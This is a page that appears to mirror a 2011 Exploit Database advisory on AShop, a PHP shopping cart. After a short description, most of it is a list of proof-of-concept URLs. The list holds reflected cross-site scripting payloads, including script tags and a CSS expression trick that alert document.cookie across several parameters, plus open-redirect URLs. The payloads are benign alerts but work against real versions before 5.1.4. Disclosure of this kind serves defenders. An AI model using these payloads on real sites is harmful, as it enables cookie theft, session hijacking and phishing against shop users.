AShop – Open Redirection / Cross-Site Scripting

• Exploit Database
• 13 阅读

• 作者： Infoserve Security Team
  日期： 2011-11-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36297/

• source: https://www.securityfocus.com/bid/50616/info
  
  AShop is prone to multiple open-redirection issues and multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input.
  
  Attackers can exploit these issues to execute arbitrary script or HTML code, steal cookie-based authentication credentials, and conduct phishing attacks. Other attacks may also be possible.
  
  Versions prior to AShop 5.1.4 are vulnerable. 
  
  IE8
  
  http://www.example.com/ashop/?'"<script>alert(document.cookie)</script>
  http://www.example.com/ashop/index.php?'"<script>alert(document.cookie)</script>
  http://www.example.com/ashop/picture.php?picture=" stYle=x:expre/**/ssion(alert(document.cookie)) ns="
  http://www.example.com/ashop/index.php?language='"<script>alert(document.cookie)</script>
  
  FF 7.1
  
  http://www.example.com/ashop/index.php?searchstring=1&showresult=true&exp='"</script><script>alert(666);</script>&resultpage=&categories=off&msg=&search=index.php&shop=1
  http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage='"</script><script>alert(document.cookie)</script>&msg=
  http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=1&msg='"</script><script>alert(document.cookie)</script>
  http://www.example.com/ashop/basket.php?cat=0&sid='"</script><script>alert(document.cookie)</script>&shop=1&payoption=3
  
  Open Redirection
  
  http://www.example.com/ashop/language.php?language=sv&redirect=http://www.google.com
  http://www.example.com/ashop/currency.php?currency=aud&redirect=http://www.google.com
  http://www.example.com/ashop/currency.php?redirect=http://www.google.com